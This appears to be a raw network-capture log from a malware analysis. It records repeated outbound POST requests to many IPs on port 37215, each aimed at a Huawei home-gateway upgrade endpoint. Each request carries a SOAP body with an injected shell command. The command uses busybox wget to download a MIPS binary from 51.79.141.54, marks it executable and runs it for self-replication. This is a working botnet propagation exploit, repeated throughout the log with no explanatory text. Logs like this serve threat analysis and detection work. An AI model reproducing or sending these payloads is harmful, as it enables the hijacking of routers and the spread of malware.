                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    30192.168.2.144257441.204.232.1137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.112994909 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.544485092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    31192.168.2.1443546197.174.73.16837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.112996101 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.544485092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    32192.168.2.1446440157.158.61.10337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.115626097 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.493464947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    33192.168.2.145488037.145.73.19337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.115626097 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.493464947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    34192.168.2.145743241.189.159.16937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.115626097 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.501239061 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    35192.168.2.1446108197.2.240.8537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.115720034 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
